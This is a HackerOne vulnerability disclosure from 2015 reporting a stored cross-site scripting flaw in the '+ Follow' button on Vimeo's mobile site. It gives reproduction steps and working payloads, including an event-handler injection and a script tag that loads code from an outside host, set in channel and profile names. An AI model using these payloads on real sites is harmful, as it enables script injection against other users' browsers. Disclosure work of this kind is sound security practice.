Vimeo: XSS on mobile version of vimeo.com where the button "Follow" appears

2015-09-09T01:05:03
ID H1:88088
Type hackerone
Reporter stefanofinding
Modified 2017-08-31T10:17:58

Description

Description

In the mobile version of https://vimeo.com, you will see + Follow buttons in places like the description of a channel, the description of a video, the profile of a user, the list of users you follow and the list of users that other users follow. The problem is that the code that builds the button doesn't escape the Name of the channel or user. This allows to insert HTML code, even in the channel Name because the value is inserted as attribute of a <button> element.

Proof of concept

Channel page. Requires user interaction: 1. Using the desktop web version of Vimeo, go to https://vimeo.com/[your_vimeo_url]/channels (like https://vimeo.com/user36690798/channels). 2. Click on + Create new channel at the right of the page. 3. Enter " ontouchstart="alert(document.domain) for Channel Name. 4. Click on Create This Channel. 5. Copy & save the URL of the new Channel. 6. Using the mobile web version of Vimeo and other user, go to the URL you saved in the last step (like https://vimeo.com/channels/963609). 7. Touch on + Follow. 8. alert(document.domain) is executed. I have a Channel with the XSS here https://vimeo.com/channels/962193.

Profile page. Doesn't require user interaction: 1. Using the web version of Vimeo, go to https://vimeo.com/settings. 2. Copy & save your Vimeo URL. 3. Change your Name to "><script src=//u00f1.xyz>. 4. Click on Save Changes. 5. Using the mobile web version of Vimeo and other user, go to the URL you saved in step 2. 6. alert(document.domain) is executed. I have a profile with the XSS here https://vimeo.com/user36690798.

I think that the bug is in the code that builds the + Follow button, because the same vulnerability is in the other places I mentioned in the Description.